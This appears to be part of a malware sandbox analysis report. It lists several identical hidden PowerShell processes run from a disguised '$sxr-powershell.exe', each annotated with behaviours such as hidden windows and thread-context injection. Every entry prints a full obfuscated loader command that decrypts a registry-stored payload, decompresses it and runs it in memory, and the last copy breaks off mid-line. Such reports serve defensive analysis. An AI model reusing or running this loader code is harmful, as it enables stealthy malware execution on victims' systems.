                                                                                                                          • C:\Windows\$sxr-powershell.exe
                                                                                                                            "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2100).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
                                                                                                                            7⤵
                                                                                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Hide Artifacts: Hidden Window
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:5876
                                                                                                                          • C:\Windows\$sxr-powershell.exe
                                                                                                                            "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2100).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
                                                                                                                            7⤵
                                                                                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Hide Artifacts: Hidden Window
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:5992
                                                                                                                          • C:\Windows\$sxr-powershell.exe
                                                                                                                            "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2100).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
                                                                                                                            7⤵
                                                                                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Hide Artifacts: Hidden Window
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:6108
                                                                                                                          • C:\Windows\$sxr-powershell.exe
                                                                                                                            "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2100).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join 